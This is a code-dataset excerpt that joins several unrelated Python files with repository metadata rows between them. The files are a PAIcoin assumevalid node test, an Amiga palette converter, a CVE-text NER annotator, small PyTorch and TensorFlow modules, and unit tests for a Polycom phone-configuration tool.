self.send_message(headers_message)
class AssumeValidTest(PAIcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.add_nodes(3)
# Start node0. We don't start the other nodes yet since
# we need to pre-mine a block with an invalid transaction
# signature so we can pass in the block hash as assumevalid.
self.start_node(0)
def send_blocks_until_disconnected(self, node):
"""Keep sending blocks to the node until we're disconnected."""
for i in range(len(self.blocks)):
try:
node.send_message(msg_block(self.blocks[i]))
except IOError as e:
assert str(e) == 'Not connected, no pushbuf'
break
def assert_blockchain_height(self, node, height):
"""Wait until the blockchain is no longer advancing and verify it's reached the expected height."""
last_height = node.getblock(node.getbestblockhash())['height']
timeout = 10
while True:
time.sleep(0.25)
current_height = node.getblock(node.getbestblockhash())['height']
if current_height != last_height:
last_height = current_height
if timeout < 0:
assert False, "blockchain too short after timeout: %d" % current_height
timeout - 0.25
continue
elif current_height > height:
assert False, "blockchain too long: %d" % current_height
elif current_height == height:
break
def run_test(self):
# Connect to node0
node0 = BaseNode()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))
node0.add_connection(connections[0])
NetworkThread().start() # Start up network handling in another thread
node0.wait_for_verack()
# Build the blockchain
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
self.blocks = []
# Get a pubkey for the coinbase TXO
coinbase_key = CECKey()
coinbase_key.set_secretbytes(b"horsebattery")
coinbase_pubkey = coinbase_key.get_pubkey()
# Create the first block with a coinbase output to our key
height = 1
block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)
self.blocks.append(block)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
# Bury the block 100 deep so the coinbase output is spendable
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
# Create a transaction spending the coinbase output with an invalid (null) signature
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE])))
tx.calc_sha256()
block102 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block102.vtx.extend([tx])
block102.hashMerkleRoot = block102.calc_merkle_root()
block102.rehash()
block102.solve()
self.blocks.append(block102)
self.tip = block102.sha256
self.block_time += 1
height += 1
# Bury the assumed valid block 2100 deep
for i in range(2100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.nVersion = 4
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
# Start node1 and node2 with assumevalid so they accept a block with a bad signature.
self.start_node(1, extra_args=["-assumevalid=" + hex(block102.sha256)])
node1 = BaseNode() # connects to node1
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], node1))
node1.add_connection(connections[1])
node1.wait_for_verack()
self.start_node(2, extra_args=["-assumevalid=" + hex(block102.sha256)])
node2 = BaseNode() # connects to node2
connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
node2.add_connection(connections[2])
node2.wait_for_verack()
# send header lists to all three nodes
node0.send_header_for_blocks(self.blocks[0:2000])
node0.send_header_for_blocks(self.blocks[2000:])
node1.send_header_for_blocks(self.blocks[0:2000])
node1.send_header_for_blocks(self.blocks[2000:])
node2.send_header_for_blocks(self.blocks[0:200])
# Send blocks to node0. Block 102 will be rejected.
self.send_blocks_until_disconnected(node0)
self.assert_blockchain_height(self.nodes[0], 101)
# Send all blocks to node1. All blocks will be accepted.
for i in range(2202):
node1.send_message(msg_block(self.blocks[i]))
# Syncing 2200 blocks can take a while on slow systems. Give it plenty of time to sync.
node1.sync_with_ping(120)
assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)
# Send blocks to node2. Block 102 will be rejected.
self.send_blocks_until_disconnected(node2)
self.assert_blockchain_height(self.nodes[2], 101)
if __name__ == '__main__':
AssumeValidTest().main()
| 41.547264 | 107 | 0.629505 |
794640faeb0b06ea4be50c2d13245de9618dea97 | 2,163 | py | Python | Python-toolchain/2D/png_to_v_copper_list.py | astrofra/demo-unusual-suspects | 917c9d07aeaff86cc65793219f28865e55e5dc76 | [
"MIT"
] | 8 | 2015-05-19T22:02:17.000Z | 2017-10-03T18:40:28.000Z | Python-toolchain/2D/png_to_v_copper_list.py | astrofra/demo-unusual-suspects | 917c9d07aeaff86cc65793219f28865e55e5dc76 | [
"MIT"
] | 2 | 2020-03-29T16:14:20.000Z | 2020-03-29T16:19:15.000Z | Rog-Amiga-Remake/Python-toolchain/2D/png_to_v_copper_list.py | astrofra/amiga-experiments | 07b39cdcc581cb64711eb48caa54a4d90ca47811 | [
"MIT"
] | 3 | 2017-10-11T23:50:19.000Z | 2018-07-21T16:11:29.000Z | ## png_to_copper_list.py
import png
import math
import colorsys
filename_in = ['gradient.png', 'blue_gradient.png']
filename_out = '../../Assets/vert_copper_palettes'
global fc, fh
def main():
print('png_to_vertical_copper_list')
fc = open(filename_out + '.c', 'w')
fc.write('/* Vertical copper list palettes */\n')
fc.write('\n')
fc.write('#include <exec/types.h>\n')
fc.write('#include <intuition/intuition.h>\n')
fc.write('\n')
fh = open(filename_out + '.h', 'w')
fh.write('/* Vertical copper list palettes (headers) */\n')
fh.write('\n')
fh.write('#include <exec/types.h>\n')
fh.write('#include <intuition/intuition.h>\n')
fh.write('\n')
for _filename in filename_in:
print('Loading bitmap : ' + _filename)
fc.write('UWORD vertical_copper_pal_' + _filename.replace('.png', '') + '[] =\n')
fc.write('{\n')
fc.write('\t')
## Loads the PNG image
png_buffer = png.Reader(filename = _filename)
b = png_buffer.read()
# print(b)
## Get size & depth
w = b[0]
h = b[1]
print('w = ' + str(w) + ', h = ' + str(h))
fh.write('extern UWORD vertical_copper_pal_' + _filename.replace('.png', '') + '[' + str(w) + '];\n')
print('bitdepth = ' + str(b[3]['bitdepth']))
if b[3]['greyscale']:
print('!!!Error, cannot process a greyscale image :(')
return 0
if b[3]['bitdepth'] > 8:
print('!!!Error, cannot process a true color image :(')
return 0
original_palette = b[3]['palette']
png_out_buffer = []
prev_optimized_line_palette = []
buffer_in = list(b[2])
## For each line of the image
first_line = buffer_in[0]
for x in range(0,49):
color_idx = first_line[x]
color_val = original_palette[color_idx]
color_hex = ((color_val[0] / 16) << 8) + ((color_val[1] / 16) << 4) + (color_val[2] / 16)
color_hex = hex(color_hex)
print('color index = ' + str(color_idx) + ', color = ' + str(color_val) + ', color_hex = ' + str(color_hex))
fc.write(str(color_hex) + ',')
if ((x+1)%16) == 0:
fc.write('\n\t')
fc.write('\n')
fc.write('};\n')
fc.write('\n')
fc.close()
return 1
main() | 25.75 | 112 | 0.588534 |
7946415964c7d610a104b551b9350632a79e91f8 | 2,677 | py | Python | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 12 | 2019-05-10T07:58:30.000Z | 2021-10-19T01:39:06.000Z | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 3 | 2021-08-04T06:11:26.000Z | 2022-02-27T17:08:18.000Z | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 3 | 2019-07-25T09:35:17.000Z | 2022-03-22T10:29:32.000Z | import csv
import json
import sys
import re
import en_core_web_lg
def usage():
print 'usage: python annotator.py <path_to_dataset_in_csv> <output_file>'
def _get_annotations(desc, pattern, label):
regex = re.compile(pattern)
return [(match.start(), match.start() + len(match.group()), label) for match in regex.finditer(desc)]
# ------------------- ANNOTATION RULES -------------------
def find_functions(desc):
pattern = r'[a-zA-Z0-9]+(_[a-zA-Z0-9]+)+'
return _get_annotations(desc, pattern, "FUNCTION")
def find_kernel_version(desc):
pattern = r'\d+(\.\d+)+(-?)(\w+)?'
return _get_annotations(desc, pattern, "VERSION")
def find_file_path(desc):
pattern = r'(/)?\w+(/\w+)+\.c'
return _get_annotations(desc, pattern, "SOURCECODE")
def find_fd_driver(desc):
pattern = r'(/)?\w+(/\w+(?!\.c))+'
return _get_annotations(desc, pattern, "DRIVER")
def find_driver(desc):
pattern = r'[a-zA-Z]+\s[a-zA-Z\-]+\s(?=driver)'
return _get_annotations(desc, pattern, "DRIVER")
def find_structs(desc):
pattern = r'(?<=struct\s)\w+(\s\w+)'
return _get_annotations(desc, pattern, "STRUCT")
# ------------------- END ANNOTATION RULES -------------------
TAGGERS = [
find_functions,
find_kernel_version,
find_file_path,
find_driver,
find_structs,
find_fd_driver
]
def annotate_NER(dataset_file):
TRAIN_DATA = []
with open(dataset_file, 'r') as cve_dataset_f:
# cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_dataset_f:
entities = []
for tagger in TAGGERS:
entities += tagger(cve)
TRAIN_DATA += [[cve, {'entities': entities}]]
with open('annotated_{}_NER_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def annotate_DEP(dataset_file):
TRAIN_DATA = []
model = en_core_web_lg.load()
with open(dataset_file, 'r') as cve_dataset_f:
cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_reader:
tagged_desc = model(unicode(cve['Avail.']))
heads = [tok.head.i for tok in tagged_desc]
deps = ['-']*len(heads)
TRAIN_DATA += [[cve['Avail.'], {'heads': heads, 'deps': deps}]]
with open('annotated_{}_DEP_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def main(dataset_file):
annotate_NER(dataset_file)
# annotate_DEP(dataset_file)
if __name__ == '__main__':
if len(sys.argv) <= 1:
usage()
sys.exit(0)
main(sys.argv[1])
| 27.316327 | 106 | 0.615614 |
7946420b133425777c2367020fe5b937f948de9f | 721 | py | Python | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | import tensorflow as tf
def CreatePseudoRS(asso_idx, data):
'''
returns:
- indices to gather_nd the data back to original sorting
- pseudo row splits
- resorted data, according to the pseudo RS
'''
ids = tf.range(tf.shape(asso_idx)[0],dtype='int32')
args = tf.argsort(asso_idx, axis=-1)
sids = tf.expand_dims(tf.gather(ids,args),axis=1)
sasso_idx = tf.gather(asso_idx,args)
u,belongs_to_prs,c = tf.unique_with_counts(sasso_idx)
c = tf.concat([tf.zeros_like(c[0:1], dtype='int32'),c], axis=0)
sdata = tf.gather_nd(data, sids)
return tf.expand_dims(args,axis=1), tf.cumsum(c, axis=0), sdata, tf.expand_dims(belongs_to_prs,axis=1)
| 30.041667 | 106 | 0.647712 |
79464283c0c8f4ea4127782d5bdb95dd90d2c02d | 1,821 | py | Python | norms.py | ishine/AFRCNN-For-Speech-Separation | 8be8a33b87c7e294296c141c861f84736982a7c2 | [
"MIT"
] | 108 | 2021-10-06T08:42:48.000Z | 2022-03-28T09:16:14.000Z | norms.py | mtxing/AFRCNN-For-Speech-Separation | 2d2d20e23731279affd797441252e25401451f0d | [
"MIT"
] | 2 | 2022-03-16T09:20:21.000Z | 2022-03-30T12:24:11.000Z | norms.py | mtxing/AFRCNN-For-Speech-Separation | 2d2d20e23731279affd797441252e25401451f0d | [
"MIT"
] | 33 | 2021-10-11T09:00:30.000Z | 2022-03-24T12:15:42.000Z | import torch
import torch.nn as nn
class ChannelWiseLayerNorm(nn.LayerNorm):
"""
Channel wise layer normalization
"""
def __init__(self, *args, **kwargs):
super(ChannelWiseLayerNorm, self).__init__(*args, **kwargs)
def forward(self, x):
"""
x: N x C x T
"""
x = torch.transpose(x, 1, 2)
x = super().forward(x)
x = torch.transpose(x, 1, 2)
return x
class GlobalChannelLayerNorm(nn.Module):
'''
Global Layer Normalization
'''
def __init__(self, channel_size):
super(GlobalChannelLayerNorm, self).__init__()
self.channel_size = channel_size
self.gamma = nn.Parameter(torch.ones(channel_size),
requires_grad=True)
self.beta = nn.Parameter(torch.zeros(channel_size),
requires_grad=True)
def apply_gain_and_bias(self, normed_x):
""" Assumes input of size `[batch, chanel, *]`. """
return (self.gamma * normed_x.transpose(1, -1) +
self.beta).transpose(1, -1)
def forward(self, x):
"""
x: N x C x T
"""
dims = list(range(1, len(x.shape)))
mean = x.mean(dim=dims, keepdim=True)
var = torch.pow(x - mean, 2).mean(dim=dims, keepdim=True)
return self.apply_gain_and_bias((x - mean) / (var + 1e-8).sqrt())
def select_norm(norm, dim):
"""
Build normalize layer
LN cost more memory than BN
"""
if norm not in ["cLN", "gLN", "BN"]:
raise RuntimeError("Unsupported normalize layer: {}".format(norm))
if norm == "cLN":
return ChannelWiseLayerNorm(dim, elementwise_affine=True)
elif norm == "BN":
return nn.BatchNorm1d(dim)
else:
return GlobalChannelLayerNorm(dim) | 29.852459 | 74 | 0.572213 |
7946438fb7d5b3709913492930b2f7039896a158 | 302 | py | Python | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | x = ''.join(input().split())
maximum = 0
tmp = 0
for i in range(len(x)):
if x[i] != 'L':
tmp = 0
else :
if i > 0 and i < len(x)-1:
tmp += 1
elif i == 0:
tmp += 1
elif i == len(x)-1:
tmp += 1
if tmp > maximum:
maximum = tmp
print(x.count('L'), maximum)
| 14.380952 | 30 | 0.453642 |
7946439425f43bf42f95979f31147aa5638f3136 | 17,986 | py | Python | tests/test_config.py | mjmunger/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | 7 | 2017-11-15T19:25:37.000Z | 2022-01-20T01:30:56.000Z | tests/test_config.py | DrDamnit/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | 40 | 2020-05-19T19:46:20.000Z | 2020-11-12T16:13:55.000Z | tests/test_config.py | mjmunger/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | null | null | null | import unittest
import os.path
import json
import copy
import site
from tempfile import NamedTemporaryFile
from tempfile import TemporaryDirectory
from unittest_data_provider import data_provider
from poly_py_tools.polypy_config import PolypyConfig
from poly_py_tools.column_mapper import ColumnMapper
from unittest.mock import patch, mock_open, Mock, MagicMock
class HelperTestValidate:
states = None
polycom_paths = ['000000000000.cfg', '000000000000-directory~.xml', "Config/applications.cfg", "Config/device.cfg",
"Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg",
"Config/reg-basic.cfg", "Config/region.cfg", "Config/sip-basic.cfg", "Config/sip-interop.cfg",
"Config/site.cfg", "Config/video.cfg", "Config/video-integration.cfg"]
def __init__(self, mock_states):
# setup default states - everything exists
default_states = {}
default_states["/etc/asterisk/sip.conf"] = True
default_states["/srv/tftp/Config"] = True
for path in self.polycom_paths:
default_states[os.path.join("/srv/tftp", path)] = True
self.states = {**default_states, **mock_states}
def lookup(self, path):
return self.states[path]
class TestConfig(unittest.TestCase):
provider_test_init = lambda: (
(['000000000000.cfg', '000000000000-directory~.xml', "Config/applications.cfg", "Config/device.cfg",
"Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg",
"Config/reg-basic.cfg", "Config/region.cfg", "Config/sip-basic.cfg", "Config/sip-interop.cfg",
"Config/site.cfg", "Config/video.cfg", "Config/video-integration.cfg"],),
)
@data_provider(provider_test_init)
def test_init(self, polycom_files):
config = PolypyConfig()
self.assertEqual(polycom_files, config.polycom_files)
provider_test_find_config = lambda: (
# check_paths expected_config_path
(["/path/to/current/directory", "/etc/polypy/"], "/path/to/current/directory/polypy.conf", True),
(["/path/to/current/directory", "/etc/polypy/"], "/etc/polypy/polypy.conf", True),
(["/path/to/current/directory", "/etc/polypy/"], None, False),
)
@data_provider(provider_test_find_config)
def test_find_config(self, check_paths, expected_config_path, exists):
with patch.object(os.path, "exists") as mock_os:
mock_os.side_effect = lambda path: path == expected_config_path
config = PolypyConfig()
for path in check_paths:
config.add_search_path(path)
self.assertEqual(exists, config.find())
self.assertEqual(expected_config_path, config.config_path)
@staticmethod
def create_config_tuples():
fixtures_dir = os.path.join(os.path.dirname(__file__), 'fixtures/')
base_config_path = os.path.join(fixtures_dir, "base_config.json")
with open(base_config_path) as fp:
base_config = json.load(fp)
return_tuples = ()
config1 = copy.deepcopy(base_config)
config1['config_path'] = fixtures_dir
config1['paths']['asterisk'] = os.path.join(fixtures_dir, "tests/fixtures/etc/asterisk/")
config1['paths']['tftproot'] = os.path.join(fixtures_dir, "tests/fixtures/srv/tftp/")
return_tuples = return_tuples + ((json.dumps(config1), ["/path/to/current/directory", "/etc/polypy/"],
"/path/to/current/directory/polypy.conf",),)
return return_tuples
config_fixtures = lambda: TestConfig.create_config_tuples()
@data_provider(config_fixtures)
def test_load_config(self, config, check_paths, expected_config_path):
with patch("os.path") as mock_os:
with patch("builtins.open", mock_open(read_data=config)) as mock_file:
mock_os.path.exists = lambda path: path == expected_config_path
expected_config_object = json.loads(config)
assert open(expected_config_path).read() == config
mock_file.assert_called_with(expected_config_path)
config = PolypyConfig()
for path in check_paths:
config.add_search_path(path)
config.find()
config.load()
self.assertEqual(expected_config_object, config.json)
def test_add_search_path(self):
config = PolypyConfig()
config.add_search_path("/path/to/some/place")
config.add_search_path("/etc/polypy")
self.assertEqual(3, len(config.search_paths))
@data_provider(config_fixtures)
def test_write_config(self, config_string, check_paths, expected_config_path):
config = PolypyConfig()
config.json = json.loads(config_string)
f = NamedTemporaryFile(delete=False)
config.config_path = f.name
config.write()
with open(f.name, 'r') as written_config_fp:
loaded_config = json.load(written_config_fp)
self.assertEqual(json.loads(config_string), loaded_config)
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
@data_provider(config_fixtures)
def test_write_config_failure(self, config_string, check_paths, expected_config_path):
m = mock_open()
with patch("builtins.open", m):
config = PolypyConfig()
config.config = json.loads(config_string)
m.side_effect = PermissionError()
with self.assertRaises(PermissionError):
config.write()
provider_test_write_default_config = lambda: (
({"lib_path": "/var/lib/polypy", "share_path": "/usr/share/polypy/", "config_path": "/etc/asterisk/polypy.conf",
"package_path": "/usr/local/lib/python3.7/dist-packages/poly_py_tools", "server_addr": "127.0.0.1",
"paths": {"asterisk": "/etc/asterisk/", "tftproot": "/srv/tftp/"},
"dictionary": {"first": ["first", "firstname", "first name"], "last": ["last", "lastname", "last name"],
"exten": ["exten", "extension", "new extension"], "vm": ["vm", "voicemail"],
"mac": ["mac", "macaddr", "mac address", "physical address"], "email": ["email"],
"endpoint": ["device", "phone", "fax", "model"],
"cid_number": ["cid", "cname", "callerid", "Caller-ID"],
"priority": ["priority", "sort", "order by", "order"], "label": ["label"],
"did": ["contact", "direct phone", "did", "number"],
"group_dial": ["simul-ring", "group dial"], "site": ["site"]}, "csvmap": {}},),
)
@data_provider(provider_test_write_default_config)
def test_write_default_config(self, expected_config):
tmp_dir = TemporaryDirectory()
tmp_config = os.path.join(tmp_dir.name, 'polypy.conf')
config = PolypyConfig()
config.write_default_config(tmp_config)
with open(tmp_config) as fp:
actual_config = json.load(fp)
expected_config['config_path'] = tmp_config
expected_config['package_path'] = os.path.join(site.getsitepackages()[0], "poly_py_tools")
self.assertEqual(expected_config, actual_config)
tmp_dir.cleanup()
provider_test_set_path = lambda: (
("asterisk", "/current/working/directory/to/something", "/current/working/directory/to/something"),
("asterisk", "to/something", "/current/working/directory/to/something"),
("asterisk", ".", "/current/working/directory"),
("tftproot", "/current/working/directory/to/something", "/current/working/directory/to/something"),
("tftproot", "to/something", "/current/working/directory/to/something"),
("tftproot", ".", "/current/working/directory"),
)
@data_provider(provider_test_set_path)
def test_set_path(self, path, target_path, expected_path):
configs = {}
configs['paths'] = {}
configs['paths']['asterisk'] = ""
configs['paths']['tftproot'] = ""
f = NamedTemporaryFile(delete=False)
with patch.object(os, 'getcwd', return_value="/current/working/directory") as mock_os:
config = PolypyConfig()
config.config_path = f.name
config.json = configs
config.set_path(path, target_path)
self.assertEqual(expected_path, config.json['paths'][path])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
def test_set_server(self):
configs = {}
configs['server_addr'] = ""
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.json = configs
config.config_path = f.name
config.set_server("test.example.org")
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
self.assertEqual("test.example.org", config.json['server_addr'])
provider_test_validate = lambda: (
# sip.conf exists tftproot exists missing_file_count missing_polycom_files
(True, True, 0, []),
(False, True, 1, []),
(True, False, 1, []),
(True, True, 1, ["Config/features.cfg"]),
(True, True, 4,
["Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg"]),
(False, True, 5,
["Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg"]),
)
@data_provider(provider_test_validate)
def test_validate(self, sip_conf_state, tftproot_state, missing_file_count, missing_polycom_files):
mock_states = {}
mock_states["/etc/asterisk/sip.conf"] = sip_conf_state
mock_states["/srv/tftp/"] = tftproot_state
for path in missing_polycom_files:
mock_states[os.path.join("/srv/tftp/", path)] = False
helper = HelperTestValidate(mock_states)
with patch("os.path.exists", MagicMock(side_effect=helper.lookup)) as mock_os_path:
config = PolypyConfig()
config.json = {"lib_path": "/var/lib/polypy", "share_path": "/usr/share/polypy/",
"config_path": "/tmp/polypy.conf",
"package_path": "/usr/local/lib/python3.7/dist-packages/poly_py_tools",
"server_addr": "127.0.0.1",
"paths": {"asterisk": "/etc/asterisk/", "tftproot": "/srv/tftp/"}}
status = config.validate()
failed_counter = 0
for path in status:
if status[path] is False:
failed_counter = failed_counter + 1
self.assertEqual(missing_file_count, failed_counter)
self.assertEqual(status['/etc/asterisk/'], sip_conf_state)
self.assertEqual(status['/srv/tftp/'], tftproot_state)
self.assertEqual(status["/srv/tftp/000000000000.cfg"], "000000000000.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/000000000000-directory~.xml"],
"000000000000-directory~.xml" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/applications.cfg"],
"Config/applications.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/device.cfg"], "Config/device.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/features.cfg"],
"Config/features.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/H323.cfg"], "Config/H323.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/polycomConfig.xsd"],
"Config/polycomConfig.xsd" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/reg-advanced.cfg"],
"Config/reg-advanced.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/reg-basic.cfg"],
"Config/reg-basic.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/region.cfg"], "Config/region.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/sip-basic.cfg"],
"Config/sip-basic.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/sip-interop.cfg"],
"Config/sip-interop.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/site.cfg"], "Config/site.cfg" not in missing_polycom_files)
self.assertEqual(status["/srv/tftp/Config/video.cfg"], "Config/video.cfg" not in missing_polycom_files)
provider_test_dictionary_add = lambda : (
("first", "nKhI"),
("last", "rAQhbM"),
("exten", "XZmx"),
("vm", "wOVLrkhDhWvisNXW"),
("mac", "oMbMxdFqBLWDfpDYl"),
("email", "FQSOXqCWP"),
("endpoint", "wPMRgSHhyXy"),
("cid_number", "ZqUaVz"),
("priority", "ckoJofRYAJ"),
("label", "vUkTydmDk"),
("did", "CQriEvEnQhbEIn"),
("group_dial", "nxFjCJshs"),
("site", "FnnBp"),
)
@data_provider(provider_test_dictionary_add)
def test_dictionary_add(self, word, alias):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.config_path = f.name
config.write_default_config(f.name)
config.add_dictionary_alias(word, alias)
self.assertTrue(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertTrue(alias in resultant_config['dictionary'][word])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
@data_provider(provider_test_dictionary_add)
def test_dictionary_del(self, word, alias):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.config_path = f.name
config.write_default_config(f.name)
config.add_dictionary_alias(word, alias)
self.assertTrue(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertTrue(alias in resultant_config['dictionary'][word])
config.del_dictionary_word(word, alias)
self.assertFalse(alias in config.json['dictionary'][word])
fp = open(f.name, 'r')
resultant_config = json.load(fp)
fp.close()
self.assertFalse(alias in resultant_config['dictionary'][word])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
provider_column_headers = lambda: (
(["Last name", "First Name", "Title", "Extension ", "Voicemail ", "Direct Phone", "Simul-ring", "Device", "MAC", "Email", "site", "callerid", "label", "priority"], {"first": 1, "last": 0, "exten": 3, "vm": 4, "mac": 8, "email": 9, "endpoint": 7, "cid_number": 11, "priority": 13, "label": 12, "did": 5, "group_dial": 6, "site": 10}),
)
@data_provider(provider_column_headers)
def test_map_csv(self, header, expected_map):
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.set_default_config(f.name)
mapper = ColumnMapper(config)
config.set_map(mapper.match_columns(header))
fp = open(f.name, 'r')
saved_configs = json.load(fp)
fp.close()
self.assertEqual(expected_map, saved_configs['csvmap'])
def test_configs(self):
config = PolypyConfig()
config.json = "685d69b8-ff2d-40c4-85d9-08f4c453445b"
self.assertEqual("685d69b8-ff2d-40c4-85d9-08f4c453445b", config.configs())
def test_asterisk_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "72de147f-f46c-4286-a443-b9b4d8abbf37"
self.assertEqual("72de147f-f46c-4286-a443-b9b4d8abbf37", config.asterisk_path())
def test_tftproot_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['tftproot'] = "f3ab756c-a431-4c8f-92db-701906483121"
self.assertEqual("f3ab756c-a431-4c8f-92db-701906483121", config.tftproot_path())
def test_update_paths(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "3253989b-a86e-415f-8f0f-99f0117c1f28"
config.json['paths']['tftproot'] = "f646d882-8887-4639-a4b2-ca4930a4f4e2"
self.assertEqual("3253989b-a86e-415f-8f0f-99f0117c1f28", config.asterisk_path())
self.assertEqual("f646d882-8887-4639-a4b2-ca4930a4f4e2", config.tftproot_path())
config.update_paths('asterisk', "1b9a1167-e01f-458c-a992-708dd71c2a4a")
self.assertEqual("1b9a1167-e01f-458c-a992-708dd71c2a4a", config.asterisk_path())
config.update_paths('tftproot', "f174c720-1aea-4feb-b949-79dc953d77f8")
self.assertEqual("f174c720-1aea-4feb-b949-79dc953d77f8", config.tftproot_path())
def test_pjsip_path(self):
config = PolypyConfig()
config.json = {}
config.json['paths'] = {}
config.json['paths']['asterisk'] = "a7707f61-2dd9-4653-8ea5-4cbad0402007"
self.assertEqual("a7707f61-2dd9-4653-8ea5-4cbad0402007/pjsip.conf", config.pjsip_path())
config.pjsip_path = MagicMock(return_value="aa7e7971-d515-49a4-8ded-38a04b0694d8")
self.assertEqual("aa7e7971-d515-49a4-8ded-38a04b0694d8", config.pjsip_path())
if __name__ == '__main__':
unittest.main()
| 43.868293 | 342 | 0.625431 |
794643c69737bbbfbdd141e078f2c15329996552 | 496 | py | Python | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | dqn/dqn_torch/networks.py | hadleyhzy34/reinforcement_learning | 14371756c2ff8225dc800d146452b7956875410c | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class Q_Network(nn.Module):
def __init__(self, states, actions, hidden=[64,64]):
super(Q_Network, self).__init__()
self.fc1 = nn.Linear(states, hidden[0])
self.fc2 = nn.Linear(hidden[0], hidden[1])
self.fc3 = nn.Linear(hidden[1], actions)
def forward(self,state):
x = state
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
| 27.555556 | 56 | 0.594758 |
7946445db47174945f81ce7f9131ba7ac0a4e6e7 | 4,350 | py | Python | voxsql/parser.py | ccortezia/sqlnox | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
